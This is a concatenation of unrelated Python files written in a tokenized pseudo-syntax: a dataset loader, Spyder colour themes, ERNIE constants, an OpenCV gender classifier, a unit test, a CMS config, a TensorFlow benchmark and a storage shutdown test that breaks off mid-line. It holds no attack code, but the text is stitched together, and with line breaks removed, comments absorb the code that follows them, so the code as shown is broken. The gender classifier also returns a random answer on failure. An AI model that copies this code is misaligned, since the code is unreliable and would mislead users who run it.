"""<if_stmt>self.preset_indices<is><none><block_start><pass><block_end><else_stmt><block_start>idx=self.preset_indices[self._cur_for_preset_indices]<line_sep>self._cur_for_preset_indices<augadd>1<block_end>idx=int(idx%self.real_length)<line_sep>meta=super().get_train_data(idx)<line_sep># filter boxes and labels by area areas=calc_area(meta['gt_bboxes'])<line_sep>mask=areas<g>self.area_filter_thrd<line_sep>meta['gt_bboxes']=meta['gt_bboxes'][mask :]<line_sep>meta['gt_labels']=meta['gt_labels'][mask]<line_sep>meta['db_inds']=idx<line_sep># # pad boxes and inds boxes=np.zeros((self.num_gtboxes 4)).astype(np.float32)<line_sep>num_boxes=meta['gt_bboxes'].shape[0]<line_sep>boxes[:num_boxes :]=meta['gt_bboxes'][:self.num_gtboxes]<line_sep>meta['gt_bboxes']=torch.from_numpy(boxes)<line_sep>labels=np.asarray([0]<times>self.num_gtboxes)<line_sep>labels[:num_boxes]=meta['gt_labels'][:self.num_gtboxes]<line_sep>meta['gt_labels']=torch.from_numpy(labels)<line_sep>meta['num_boxes']=num_boxes<if_stmt>num_boxes<eq>0<block_start><return><none><block_end># return None will re-run this function # proc data in extra layer <if_stmt>self.extra_layer<is><not><none><block_start>meta=self.extra_layer(meta)<block_end><return>meta<block_end><def_stmt>__len__ self<block_start><return>self.length<block_end><block_end>
# -*- coding: utf-8 -*- # ----------------------------------------------------------------------------- # Copyright (c) Spyder Project Contributors # # Licensed under the terms of the MIT License # (see LICENSE.txt for details) # ----------------------------------------------------------------------------- ANSI_COLORS={'emacs':{'black':'#000000' 'red':'#800000' 'green':'#005100' 'yellow':'#abab67' 'blue':'#151d51' 'magenta':'#510051' 'cyan':'#105151' 'white':'#ffffff' 'brightBlack':'#555555' 'brightRed':'#c80000' 'brightGreen':'#00aa00' 'brightYellow':'#cbcb7b' 'brightBlue':'#3c51e8' 'brightMagenta':'#900090' 'brightCyan':'#20a7a7' 'brightWhite':'#ffffff'} 'idle':{'black':'#ffffff' 'red':'#8a0000' 'green':'#008a00' 'yellow':'#8a4000' 'blue':'#00008a' 'magenta':'#5a005a' 'cyan':'#105151' 'white':'#ffffff' 'brightBlack':'#555555' 'brightRed':'#dd0000' 'brightGreen':'#00aa00' 'brightYellow':'#ff7700' 'brightBlue':'#0000ff' 'brightMagenta':'#900090' 'brightCyan':'#20a7a7' 'brightWhite':'#ffffff'} 'monokai':{'black':'#48483e' 'red':'#dc2566' 'green':'#8fc029' 'yellow':'#d4c96e' 'blue':'#55bcce' 'magenta':'#9358fe' 'cyan':'#56b7a5' 'white':'#f8f8f2' 'brightBlack':'#76715e' 'brightRed':'#fa2772' 'brightGreen':'#a7e22e' 'brightYellow':'#e7db75' 'brightBlue':'#66d9ee' 'brightMagenta':'#ae82ff' 'brightCyan':'#66efd5' 'brightWhite':'#f9f8f5'} 'pydev':{'black':'#ffffff' 'red':'#800000' 'green':'#00aa00' 'yellow':'#ffff99' 'blue':'#0000ff' 'magenta':'#900090' 'cyan':'#007f7f' 'white':'#efefef' 'brightBlack':'#c0c0c0' 'brightRed':'#c10000' 'brightGreen':'#00cc00' 'brightYellow':'#fff569' 'brightBlue':'#015aff' 'brightMagenta':'#bf00bf' 'brightCyan':'#00a5a5' 'brightWhite':'#ffffff'} 'scintilla':{'black':'#ffffff' 'red':'#800000' 'green':'#007f00' 'yellow':'#ffff99' 'blue':'#00007f' 'magenta':'#7f007f' 'cyan':'#007f7f' 'white':'#efefef' 'brightBlack':'#adadad' 'brightRed':'#c10000' 'brightGreen':'#00ab00' 'brightYellow':'#fff569' 'brightBlue':'#0000ff' 'brightMagenta':'#be00be' 
'brightCyan':'#00a5a5' 'brightWhite':'#ffffff'} 'spyder':{'black':'#ffffff' 'red':'#800000' 'green':'#00aa00' 'yellow':'#ffff99' 'blue':'#0000ff' 'magenta':'#900090' 'cyan':'#27b5ac' 'white':'#efefef' 'brightBlack':'#adadad' 'brightRed':'#c10000' 'brightGreen':'#00c800' 'brightYellow':'#fff569' 'brightBlue':'#0a37ff' 'brightMagenta':'#d500d5' 'brightCyan':'#2dd0c5' 'brightWhite':'#ffffff'} 'spyder/dark':{'black':'#19232D' 'red':'#c80000' 'green':'#11a642' 'yellow':'#c5bb29' 'blue':'#558eff' 'magenta':'#aa00aa' 'cyan':'#20b3a7' 'white':'#ffffff' 'brightBlack':'#4b4b4b' 'brightRed':'#ef0000' 'brightGreen':'#13c24b' 'brightYellow':'#e6e13f' 'brightBlue':'#4395ff' 'brightMagenta':'#da00da' 'brightCyan':'#23cbbd' 'brightWhite':'#ffffff'} 'zenburn':{'black':'#3F3F3F' 'red':'#705050' 'green':'#60B48A' 'yellow':'#DFAF8F' 'blue':'#506070' 'magenta':'#DC8CC3' 'cyan':'#8CD0D3' 'white':'#DCDCCC' 'brightBlack':'#709080' 'brightRed':'#DCA3A3' 'brightGreen':'#C3BF9F' 'brightYellow':'#F0DFAF' 'brightBlue':'#94BFF3' 'brightMagenta':'#EC93D3' 'brightCyan':'#93E0E3' 'brightWhite':'#DCDCCC'} 'solarized/light':{'black':'#fdf6e3' 'red':'#dc322f' 'green':'#859900' 'yellow':'#b58900' 'blue':'#268bd2' 'magenta':'#6c71c4' 'cyan':'#2aa198' 'white':'#93a1a1' 'brightBlack':'#657b83' 'brightRed':'#dc322f' 'brightGreen':'#859900' 'brightYellow':'#b58900' 'brightBlue':'#268bd2' 'brightMagenta':'#6c71c4' 'brightCyan':'#2aa198' 'brightWhite':'#fdf6e3'} 'solarized/dark':{'black':'#002b36' 'red':'#dc322f' 'green':'#859900' 'yellow':'#b58900' 'blue':'#268bd2' 'magenta':'#6c71c4' 'cyan':'#2aa198' 'white':'#93a1a1' 'brightBlack':'#657b83' 'brightRed':'#dc322f' 'brightGreen':'#859900' 'brightYellow':'#b58900' 'brightBlue':'#268bd2' 'brightMagenta':'#6c71c4' 'brightCyan':'#2aa198' 'brightWhite':'#fdf6e3'} 'inkpot':{'black':'#1f1f27' 'red':'#CD5200' 'green':'#9DCD00' 'yellow':'#cd8b00' 'blue':'#87cefa' 'magenta':'#8b8bff' 'cyan':'#87FAE5' 'white':'#93a1a1' 'brightBlack':'#313131' 'brightRed':'#CD2300' 
'brightGreen':'#C0CD00' 'brightYellow':'#ffcd8b' 'brightBlue':'#B9E1FA' 'brightMagenta':'#A3A3FF' 'brightCyan':'#B8FAEE' 'brightWhite':'#cfbfad'} 'minimal':{'black':'#ffffff' 'red':'#D22D72' 'green':'#568C3B' 'yellow':'#8A8A0F' 'blue':'#257FAD' 'magenta':'#5D5DB1' 'cyan':'#2D8F6F' 'white':'#7EA2B4' 'brightBlack':'#5A7B8C' 'brightRed':'#D22D72' 'brightGreen':'#568C3B' 'brightYellow':'#8A8A0F' 'brightBlue':'#257FAD' 'brightMagenta':'#5D5DB1' 'brightCyan':'#2D8F6F' 'brightWhite':'#EBF8FF'} 'nightlion':{'black':'#4c4c4c' 'red':'#bb0000' 'green':'#5fde8f' 'yellow':'#f3f167' 'blue':'#276bd8' 'magenta':'#bb00bb' 'cyan':'#00dadf' 'white':'#bbbbbb' 'brightBlack':'#555555' 'brightRed':'#ff5555' 'brightGreen':'#55ff55' 'brightYellow':'#ffff55' 'brightBlue':'#5555ff' 'brightMagenta':'#ff55ff' 'brightCyan':'#55ffff' 'brightWhite':'#ffffff'} 'notepad++':{'black':'#ffffff' 'red':'#CC342B' 'green':'#198844' 'yellow':'#FBA922' 'blue':'#3971ED' 'magenta':'#A36AC7' 'cyan':'#3971ED' 'white':'#C5C8C6' 'brightBlack':'#969896' 'brightRed':'#CC342B' 'brightGreen':'#198844' 'brightYellow':'#FBA922' 'brightBlue':'#3971ED' 'brightMagenta':'#A36AC7' 'brightCyan':'#3971ED' 'brightWhite':'#FFFFFF'} 'oblivion':{'black':'#1D1F21' 'red':'#CC6666' 'green':'#B5BD68' 'yellow':'#F0C674' 'blue':'#81A2BE' 'magenta':'#B294BB' 'cyan':'#8ABEB7' 'white':'#C5C8C6' 'brightBlack':'#969896' 'brightRed':'#CC6666' 'brightGreen':'#B5BD68' 'brightYellow':'#F0C674' 'brightBlue':'#81A2BE' 'brightMagenta':'#B294BB' 'brightCyan':'#8ABEB7' 'brightWhite':'#FFFFFF'} 'obsidian':{'black':'#232C31' 'red':'#2A5491' 'green':'#237986' 'yellow':'#A03B1E' 'blue':'#484D79' 'magenta':'#C59820' 'cyan':'#B02F30' 'white':'#9EA7A6' 'brightBlack':'#3F4944' 'brightRed':'#2A5491' 'brightGreen':'#237986' 'brightYellow':'#A03B1E' 'brightBlue':'#484D79' 'brightMagenta':'#C59820' 'brightCyan':'#B02F30' 'brightWhite':'#B5D8F6'} 'pastel':{'black':'#000000' 'red':'#c37372' 'green':'#72c373' 'yellow':'#c2c372' 'blue':'#7372c3' 'magenta':'#c372c2' 
'cyan':'#72c2c3' 'white':'#d9d9d9' 'brightBlack':'#323232' 'brightRed':'#dbaaaa' 'brightGreen':'#aadbaa' 'brightYellow':'#dadbaa' 'brightBlue':'#aaaadb' 'brightMagenta':'#dbaada' 'brightCyan':'#aadadb' 'brightWhite':'#ffffff'} 'retta':{'black':'#000000' 'red':'#A54242' 'green':'#8C9440' 'yellow':'#de935f' 'blue':'#5F819D' 'magenta':'#85678F' 'cyan':'#5E8D87' 'white':'#969896' 'brightBlack':'#373b41' 'brightRed':'#cc6666' 'brightGreen':'#b5bd68' 'brightYellow':'#f0c674' 'brightBlue':'#81a2be' 'brightMagenta':'#b294bb' 'brightCyan':'#8abeb7' 'brightWhite':'#c5c8c6'} 'roboticket':{'black':'#f5f5f5' 'red':'#E64569' 'green':'#89D287' 'yellow':'#DAB752' 'blue':'#439ECF' 'magenta':'#D961DC' 'cyan':'#64AAAF' 'white':'#B3B3B3' 'brightBlack':'#535353' 'brightRed':'#E4859A' 'brightGreen':'#A2CCA1' 'brightYellow':'#E1E387' 'brightBlue':'#6FBBE2' 'brightMagenta':'#E586E7' 'brightCyan':'#96DCDA' 'brightWhite':'#DEDEDE'} 'sublime-monokai/extended':{'black':'#222222' 'red':'#dc2566' 'green':'#8fc029' 'yellow':'#d4c96e' 'blue':'#55bcce' 'magenta':'#9358fe' 'cyan':'#56b7a5' 'white':'#f8f8f2' 'brightBlack':'#76715e' 'brightRed':'#fa2772' 'brightGreen':'#a7e22e' 'brightYellow':'#e7db75' 'brightBlue':'#66d9ee' 'brightMagenta':'#ae82ff' 'brightCyan':'#66efd5' 'brightWhite':'#f9f8f5'} 'vibrant-ink':{'black':'#191919' 'red':'#d00e18' 'green':'#138034' 'yellow':'#ffcb3e' 'blue':'#006bb3' 'magenta':'#6b2775' 'cyan':'#384564' 'white':'#ededed' 'brightBlack':'#5d504a' 'brightRed':'#f07e18' 'brightGreen':'#b1d130' 'brightYellow':'#fff120' 'brightBlue':'#4fc2fd' 'brightMagenta':'#de0071' 'brightCyan':'#5d504a' 'brightWhite':'#ffffff'}}<line_sep>
# -*- coding: utf-8 -* """ some rule """<class_stmt>MaxTruncation(object)<block_start>"""MaxTruncation:超长截断规则 """<line_sep>KEEP_HEAD=0# 从头开始到最大长度截断 KEEP_TAIL=1# 从头开始到max_len-1的位置截断,末尾补上最后一个id(词或字) KEEP_BOTH_HEAD_TAIL=2<block_end># 保留头和尾两个位置,然后按keep_head方式截断 <class_stmt>EmbeddingType(object)<block_start>"""EmbeddingType:文本数据需要转换的embedding类型:no_emb , ernie_emb """<line_sep>NONE_EMBEDDING=0# 不需要emb ERNIE_EMBEDDING=1# 用ernie生成emb FLUID_EMBEDDING=2<block_end># 使用fluid的op生成emb <class_stmt>FluidDataType(object)<block_start>""" FluidDataType data struct wrapper """<def_stmt>__init__ self shape dtype lod_level name=<none><block_start>self.shape=shape<line_sep>self.dtype=dtype<line_sep>self.lod_level=lod_level<line_sep>self.name=name<block_end><block_end><class_stmt>WordPieceType(object)<block_start>"""字词混合切分模式下,每个token的type"""<line_sep>SINGLE_TOKEN=0# 单个字 WORD_START=1# 词首字符 WORD_INCLUDE=2<block_end># 词中间字符 <class_stmt>DataShape(object)<block_start>"""DataShape:输入的数据类型 """<line_sep>STRING="string"# string INT="int"# int64 FLOAT="float"<block_end># float32 <class_stmt>InstanceName(object)<block_start>"""InstanceName:一些常用的命名 """<line_sep>RECORD_ID="id"<line_sep>RECORD_EMB="emb"<line_sep>SRC_IDS="src_ids"<line_sep>WORDSEG_IDS="wordseg_ids"<line_sep>MASK_IDS="mask_ids"<line_sep>LOSS_MASK="loss_mask"<line_sep>SEQ_LENS="seq_lens"<line_sep>SENTENCE_IDS="sent_ids"<line_sep>POS_IDS="pos_ids"<line_sep>TASK_IDS="task_ids"<line_sep>PHONETIC_A_IDS="phonetic_a_ids"<line_sep>PHONETIC_B_IDS="phonetic_b_ids"<line_sep>GLYPH_A_IDS="glyph_a_ids"<line_sep>GLYPH_B_IDS="glyph_b_ids"<line_sep>GLYPH_C_IDS="glyph_c_ids"<line_sep>GLYPH_D_IDS="glyph_d_ids"<line_sep>REL_POS_IDS="rel_pos_ids"<line_sep>DEEP_IDS="deep_ids"<line_sep>BEG_IDS="beg_ids"<line_sep>END_IDS="end_ids"<line_sep>#生成训练相关key TGT_LABEL="tgt_label"<line_sep>TGT_POS="tgt_pos"<line_sep>#生成解码相关key 
TGT_SRC_IDS="tgt_src_ids"<line_sep>TGT_POS_IDS="tgt_pos_ids"<line_sep>INIT_SCORES="init_scores"<line_sep>PARENT_IDX="parent_idx"<line_sep>TGT_MASK_IDS='tgt_mask_ids'<line_sep>DATA_IDS='data_ids'<line_sep>#多轮对话相关key ROLE_IDS="role_ids"<line_sep>TURN_IDS="turn_ids"<line_sep>TGT_PHONETIC_A_IDS="tgt_phonetic_a_ids"<line_sep>TGT_PHONETIC_B_IDS="tgt_phonetic_b_ids"<line_sep>TGT_GLYPH_A_IDS="tgt_glyph_a_ids"<line_sep>TGT_GLYPH_B_IDS="tgt_glyph_b_ids"<line_sep>TGT_GLYPH_C_IDS="tgt_glyph_c_ids"<line_sep>TGT_GLYPH_D_IDS="tgt_glyph_d_ids"<line_sep># seq2seq的label域相关key TRAIN_LABEL_SRC_IDS="train_label_src_ids"<line_sep>TRAIN_LABEL_MASK_IDS="train_label_mask_ids"<line_sep>TRAIN_LABEL_SEQ_LENS="train_label_seq_lens"<line_sep>INFER_LABEL_SRC_IDS="infer_label_src_ids"<line_sep>INFER_LABEL_MASK_IDS="infer_label_mask_ids"<line_sep>INFER_LABEL_SEQ_LENS="infer_label_seq_lens"<line_sep># term rank 相关的key TERM_POS="term_pos"<line_sep>TERM_TOKENS_NUMS="term_tokens_nums"<line_sep>TERM_INDEX="term_index"<line_sep>TERM_PAIRS="term_pairs"<line_sep>TERM_DIFFS="term_diffs"<line_sep>SEQUENCE_EMB="sequence_output"# 词级别的embedding POOLED_EMB="pooled_output"# 句子级别的embedding TARGET_FEED="target_feed"# 保存模型时需要的入参:表示模型预测时需要输入的变量,tensor 或者variable类型 TARGET_FEED_NAMES="target_feed_name"# 保存模型时需要的入参:表示模型预测时需要输入的变量名称和顺序 TARGET_PREDICTS="target_predicts"# 保存模型时需要的入参:表示预测时最终输出的结果 PREDICT_RESULT="predict_result"# 训练过程中需要传递的预测结果 STUDENT_PREDICT_RESULT="student_predict_result"# 训练过程中需要传递的预测结果 TEACHER_PREDICT_RESULT="teacher_predict_result"# 训练过程中需要传递的预测结果 LABEL="label"# label TEACHER_CE_LOSS="teacher_ce_loss"<line_sep>STUDENT_CE_LOSS="student_ce_loss"<line_sep>DISTILL_LOSS="distill_loss"<line_sep>PRED_LOSS="pred_loss"<line_sep>LOSS="loss"# loss # CRF_EMISSION = "crf_emission" # crf_emission TRAINING="training"# 训练过程 EVALUATE="evaluate"# 评估过程 TEST="test"# 测试过程 SAVE_INFERENCE="save_inference"# 保存inference model的过程 INFERENCE="inference"# 预测过程 
STEP="steps"<line_sep>SPEED="speed"<line_sep>TIME_COST="time_cost"<line_sep>GPU_ID="gpu_id"<line_sep>FILE_CHECKPOINTS="checkpoints"<line_sep>FILE_INFERENCE_MODEL="inference_model"<line_sep>TYPE_PY_READER="py_reader"<line_sep>TYPE_DATA_LOADER="data_loader"<line_sep># ERNIE-VIL相关key IMAGE_PIXEL_IDS="image_pixel_ids"<line_sep>IMAGE_POSITION="image_position"<line_sep>IMAGE_TAG_IDS="image_tag_ids"<line_sep>TEXT_INDEX="text_index"<line_sep>IMAGE_INDEX="image_index"<line_sep>POS_INDEX="pos_index"<line_sep># ERNIE-Layout相关key POS_2D_IDS="pos_2d_ids"<line_sep>SEGMENT_IDS="segment_ids"<line_sep># DynaBERT相关key HIDDEN_LAYERS="hidden_layers"<line_sep>LOGIT="logit"<line_sep># prompt相关key LABEL_MAP_IDS="label_map_ids"<line_sep>LABEL_TEXT_IDS="label_text_ids"<line_sep>BATCH_SIZE="batch_size"<line_sep>MAX_SEQ_LEN="max_seq_len"<block_end><class_stmt>FieldLength(object)<block_start>"""一个field在序列化成field_id_list的时候,占的长度是多少 """<line_sep>CUSTOM_TEXT_FIELD=3<line_sep>ERNIE_TEXT_FIELD=6<line_sep>SINGLE_SCALAR_FIELD=1<line_sep>ARRAY_SCALAR_FIELD=2<line_sep>BASIC_TEXT_FIELD=2<line_sep>GENERATE_LABEL_FIELD=6<line_sep>ERNIE_TERM_RANK_TEXT_FIELD=9<line_sep>ERNIT_TERM_RANK_LABEL_FIELD=4<line_sep># ERNIE-VIL RELATED VARIABLES ERNIEVIL_IMAGE_PIXEL_FIELD=1<line_sep>ERNIEVIL_IMAGE_TAGS_FIELD=1<line_sep># ERNIE-Layout RELATED VARIABLES ERNIE_LAYOUT_SEQLABEL_FIELD=10<block_end><class_stmt>FleetMode(object)<block_start>"""Fleet模式 """<line_sep>NO_FLEET="NO_FLEET"<line_sep>CPU_MODE="CPU"<line_sep>GPU_MODE="GPU"<block_end><class_stmt>UploadModelType(object)<block_start>"""模型上传的类型"""<line_sep>UPLOAD_HDFS_IMMEDIATE="immediate"# 实时上传到HDFS UPLOAD_HDFS_LAST_TIME="last_time"<block_end># 训练结束之后由paddlecloud平台进行集中上传 <class_stmt>StoreModelType(object)<block_start>"""模型保存方式的类型"""<line_sep>STORE_HDFS="hadoop"# 保存到hadoop集群上 STORE_IREPO="irepo"<block_end># 保存到irepo模型仓库中 <class_stmt>EncryptType(object)<block_start>"""模型加密的方式"""<line_sep>ENCRYPT_NONE=<none># 不加密 ENCRYPT_MEMORY="memory"# 内存加密 
ENCRYPT_FILE="file"<block_end># 文件加密 <class_stmt>InferenceRetcode(object)<block_start>""" 预测服务返回码 """<line_sep>RET_OK=200<line_sep>LOAD_JSON_FAILED=201<line_sep>MISSING_FIELD=202<block_end><class_stmt>GraphMode(object)<block_start>"""图模式 """<line_sep>#动态图 DYGRAPH="dynamic"<line_sep>#静态图 STATIC="static"<block_end>
<import_stmt>random<import_stmt>cv2<line_sep>padding=20<line_sep>MODEL_MEAN_VALUES=(78.4263377603 87.7689143744 114.895847746)<line_sep>genderList=['Male' 'Female']<class_stmt>GenderDetection()<block_start><def_stmt>__init__ self<block_start>faceProto='data/opencv_face_detector.pbtxt'<line_sep>faceModel='data/opencv_face_detector_uint8.pb'<line_sep>genderProto='data/gender_deploy.prototxt'<line_sep>genderModel='data/gender_net.caffemodel'<line_sep>self.ans=[<true> <false>]<line_sep>self.faceNet=cv2.dnn.readNet(faceModel faceProto)<line_sep>self.genderNet=cv2.dnn.readNet(genderModel genderProto)<block_end><def_stmt>highlightFace self net frame conf_threshold=0.9<block_start>frameOpencvDnn=frame.copy()<line_sep>frameHeight=frameOpencvDnn.shape[0]<line_sep>frameWidth=frameOpencvDnn.shape[1]<line_sep>blob=cv2.dnn.blobFromImage(frameOpencvDnn 1.0 (300 300) [104 117 123] <true> <false>)<line_sep>net.setInput(blob)<line_sep>detections=net.forward()<line_sep>faceBoxes=[]<for_stmt>i range(detections.shape[2])<block_start>confidence=detections[0 0 i 2]<if_stmt>confidence<g>conf_threshold<block_start>x1=int(detections[0 0 i 3]<times>frameWidth)<line_sep>y1=int(detections[0 0 i 4]<times>frameHeight)<line_sep>x2=int(detections[0 0 i 5]<times>frameWidth)<line_sep>y2=int(detections[0 0 i 6]<times>frameHeight)<line_sep>faceBoxes.append([x1 y1 x2 y2])<line_sep>cv2.rectangle(frameOpencvDnn (x1 y1) (x2 y2) (0 255 0) int(round(frameHeight/150)) 8)<block_end><block_end><return>frameOpencvDnn faceBoxes<block_end># opencv <def_stmt>detect self img<block_start><try_stmt><block_start>resultImg,faceBoxes=self.highlightFace(self.faceNet img)<if_stmt><not>faceBoxes<block_start><return>self.ans[random.randint(0 1)]<block_end><for_stmt>faceBox faceBoxes<block_start><if_stmt>(max(faceBox)<g>1024)<block_start><continue><block_end>face=img[max(0 faceBox[1]-padding):min(faceBox[3]+padding img.shape[0]-1) max(0 faceBox[0]-padding):min(faceBox[2]+padding 
img.shape[1]-1)]<line_sep>blob=cv2.dnn.blobFromImage(face 1.0 (227 227) MODEL_MEAN_VALUES swapRB=<false>)<line_sep>self.genderNet.setInput(blob)<line_sep>genderPreds=self.genderNet.forward()<line_sep>gender=genderList[genderPreds[0].argmax()]<if_stmt>(gender<eq>'Female')<block_start><return><true><block_end><else_stmt><block_start><return><false><block_end><block_end><block_end><except_stmt># isort:skip # noqa <block_start><return>self.ans[random.randint(0 1)]<block_end><block_end><block_end>
# Copyright (c) Microsoft Corporation. # Licensed under the MIT License. <import_from_stmt>fclib.models.dilated_cnn create_dcnn_model<def_stmt>test_create_dcnn_model <block_start>mod0=create_dcnn_model(seq_len=1)# default args <assert_stmt>mod0<is><not><none><line_sep>mod1=create_dcnn_model(seq_len=1 n_dyn_fea=1 n_outputs=2 n_dilated_layers=1 kernel_size=2 dropout_rate=0.05 max_cat_id=[30 120])<assert_stmt>mod1<is><not><none><line_sep>mod2=create_dcnn_model(seq_len=1 n_dyn_fea=1 n_outputs=2 n_dilated_layers=2 kernel_size=2 dropout_rate=0.05 max_cat_id=[30 120])<assert_stmt>mod2<is><not><none><block_end>
<import_stmt>FWCore.ParameterSet.Config<as>cms<line_sep># AlCaReco for track based alignment using MinBias events OutALCARECOTkAlMinBias_noDrop=cms.PSet(SelectEvents=cms.untracked.PSet(SelectEvents=cms.vstring('pathALCARECOTkAlMinBias')) outputCommands=cms.untracked.vstring('keep *_ALCARECOTkAlMinBias_*_*' 'keep L1AcceptBunchCrossings_*_*_*' 'keep L1GlobalTriggerReadoutRecord_gtDigis_*_*' 'keep *_TriggerResults_*_*' 'keep DcsStatuss_scalersRawToDigi_*_*' 'keep *_offlinePrimaryVertices_*_*' 'keep *_offlineBeamSpot_*_*'))<import_stmt>copy<line_sep>OutALCARECOTkAlMinBias=copy.deepcopy(OutALCARECOTkAlMinBias_noDrop)<line_sep>OutALCARECOTkAlMinBias.outputCommands.insert(0 "drop *")<line_sep>
"""TFTBechmark scripts"""<import_stmt>shutil<import_stmt>tempfile<import_stmt>time<import_stmt>tensorflow<as>tf<import_stmt>tqdm<import_from_stmt>datasets load_dataset<import_from_stmt>transformers RobertaTokenizerFast<import_from_stmt>tf_transformers.models Classification_Model<import_from_stmt>tf_transformers.models RobertaModel<as>Model<line_sep>_ALLOWED_DECODER_TYPES=["keras_model" "saved_model"]<class_stmt>TftBenchmark<block_start><def_stmt>__init__ self cfg<block_start>self.cfg=cfg<line_sep># Check compatible model type self.model_type=cfg.benchmark.model.type<if_stmt>self.model_type<not><in>_ALLOWED_DECODER_TYPES<block_start><raise>ValueError("Unknow model type {} defined".format(self.model_type))<block_end>self.model_name=cfg.benchmark.model.name<line_sep>self.tokenizer=RobertaTokenizerFast.from_pretrained(self.model_name)<line_sep>self.temp_dir=tempfile.mkdtemp()<block_end><def_stmt>load_and_batch_dataset self<block_start>"""Load TF dataset"""<line_sep>cfg=self.cfg<line_sep>tokenizer=self.tokenizer<line_sep># Load from hydra config dataset_name=cfg.benchmark.data.name<line_sep>take_sample=cfg.benchmark.data.take_sample<line_sep>batch_size=cfg.benchmark.data.batch_size<line_sep>max_length=cfg.benchmark.data.max_length<line_sep>dataset=load_dataset(dataset_name split="test")<if_stmt>take_sample<block_start>dataset=dataset.select(range(50))<block_end># Add summarize: with text self.dataset=dataset<line_sep>dataset=dataset.map(<lambda>e:tokenizer(e["text"] truncation=<true> padding=<true> max_length=max_length) batched=<true> )<line_sep>dataset.set_format(type="tensorflow" columns=["input_ids"])<line_sep>features={x:tf.cast(dataset[x] dtype=tf.int32).to_tensor(default_value=0 shape=[<none> max_length])<for>x ["input_ids"]}<line_sep>features['input_mask']=tf.ones_like(features['input_ids'])<line_sep>features['input_type_ids']=tf.zeros_like(features['input_ids'])<line_sep>tfdataset=tf.data.Dataset.from_tensor_slices((features)).batch(batch_size)<line_sep># 
Convert alldataset to a list for not including that latency while measuring model # performance # (batch_dataset, batch_size, seq_length) batched_datasets=[(batch_dataset batch_dataset['input_ids'].shape[0])<for>batch_dataset tfdataset]<line_sep><return>batched_datasets<block_end><def_stmt>_load_keras_model self<block_start>"""Load using TextDecoder KerasModel"""<def_stmt>classifier_fn model<block_start><def_stmt>_classifier_fn inputs<block_start><return>model(inputs)<block_end><return>_classifier_fn<block_end>model_name=self.cfg.benchmark.model.name<line_sep># Load Auto Regressive Version model=Model.from_pretrained(model_name=model_name)<line_sep>model=Classification_Model(model num_classes=2)<line_sep>model=model.get_model()<line_sep><return>classifier_fn(model)<block_end><def_stmt>_load_saved_model self<block_start>"""Load using TextDecoder saved_model"""<def_stmt>classifier_fn <block_start>model=self.loaded.signatures['serving_default']<def_stmt>_classifier_fn inputs<block_start><return>model(**inputs)<block_end><return>_classifier_fn<block_end>model_name=self.cfg.benchmark.model.name<line_sep>model=Model.from_pretrained(model_name=model_name)<line_sep>model=Classification_Model(model num_classes=2)<line_sep>model=model.get_model()<line_sep># Save as saved_model model.save_serialized(self.temp_dir overwrite=<true>)<line_sep># Load as saved_model <del_stmt>model<line_sep>self.loaded=tf.saved_model.load(self.temp_dir)<line_sep><return>classifier_fn()<block_end><def_stmt>load_model_classifier_fn self<block_start>"""Load Model"""<if_stmt>self.model_type<eq>"keras_model"<block_start>classifier_fn=self._load_keras_model()<block_end><if_stmt>self.model_type<eq>"saved_model"<block_start>classifier_fn=self._load_saved_model()<block_end><return>classifier_fn<block_end><def_stmt>run self#### Load Decoder function <block_start>classifier_fn=self.load_model_classifier_fn()<line_sep>print("Decoder function loaded succesfully")<line_sep>#### Load dataset 
batched_datasets=self.load_and_batch_dataset()<line_sep>print("Dataset loaded succesfully")<import_stmt>gc<line_sep>gc.collect()<line_sep>#### Run classifier function # Sample batch (to avoid first time compilation time) sample_batch_inputs,_=batched_datasets[0]<line_sep>outputs=classifier_fn(sample_batch_inputs)<line_sep>slines=0<line_sep>start_time=time.time()<for_stmt>(batch_inputs batch_size) tqdm.tqdm(batched_datasets unit="batch ")<block_start>outputs=classifier_fn(batch_inputs)# noqa slines<augadd>batch_size<block_end>end_time=time.time()<line_sep>shutil.rmtree(self.temp_dir)<line_sep>time_taken=end_time-start_time<line_sep>samples_per_second=slines/time_taken<line_sep><return>{"model_type":self.model_type "time_taken":time_taken "samples_per_second":samples_per_second}<block_end><block_end>
# # Copyright(c) 2020-2021 Intel Corporation # SPDX-License-Identifier: BSD-3-Clause-Clear # <import_stmt>os<import_stmt>pytest<import_from_stmt>api.cas casadm<import_from_stmt>api.cas.cache_config CacheMode<import_from_stmt>core.test_run TestRun<import_from_stmt>storage_devices.disk DiskTypeSet DiskType DiskTypeLowerThan<import_from_stmt>test_tools.dd Dd<import_from_stmt>test_tools.disk_utils Filesystem<import_from_stmt>test_utils.filesystem.file File<import_from_stmt>test_utils.os_utils drop_caches DropCachesMode sync<import_from_stmt>test_utils.size Size Unit<line_sep>mount_point="/mnt/test"<line_sep>@pytest.mark.require_disk("cache" DiskTypeSet([DiskType.optane DiskType.nand]))@pytest.mark.require_disk("core" DiskTypeLowerThan("cache"))@pytest.mark.parametrizex("cache_mode" CacheMode)@pytest.mark.parametrizex("filesystem" Filesystem)@pytest.mark.parametrizex("reboot_type" ["soft" "hard"])@pytest.mark.require_plugin("power_control")<def_stmt>test_load_after_clean_shutdown reboot_type cache_mode filesystem<block_start>""" title: Planned system shutdown test. description: Test for data consistency after clean system shutdown. pass_criteria: - DUT should reboot successfully. - Checksum of file on core device should be the same before and after reboot. 
"""<with_stmt>TestRun.step("Prepare CAS device.")<block_start>cache_disk=TestRun.disks['cache']<line_sep>cache_disk.create_partitions([Size(1 Unit.GibiByte)])<line_sep>cache_dev=cache_disk.partitions[0]<line_sep>core_dev=TestRun.disks['core']<line_sep>cache=casadm.start_cache(cache_dev cache_mode force=<true>)<line_sep>core=cache.add_core(core_dev)<line_sep>core.create_filesystem(filesystem blocksize=int(Size(1 Unit.Blocks4096)))<line_sep>core.mount(mount_point)<block_end><with_stmt>TestRun.step("Create file on cache and count its checksum.")<block_start>test_file=File(os.path.join(mount_point "test_file"))<line_sep>Dd().input("/dev/zero").output(test_file.full_path).block_size(Size(1 Unit.KibiByte)).count(1024).run()<line_sep>test_file.refresh_item()<line_sep>test_file_md5=test_file.md5sum()<line_sep>sync()<line_sep>drop_caches(DropCachesMode.ALL)<block_end><with_stmt>TestRun.step("Reset platform.")<block_start><if_stmt>reboot_type<eq>"soft"<block_start>TestRun.executor.reboot()<block_end><else_stmt><block_start>power_control=TestRun.plugin_manager.get_plugin('power_control')<line_sep>power_control.power_cycle()<block_end><block_end><with_stmt>TestRun.step("Load cache.")<block_start>casadm.load_cache(cache_dev)<line_sep>core.mount(mount_point)<block_end><with_stmt>TestRun.step("Check file 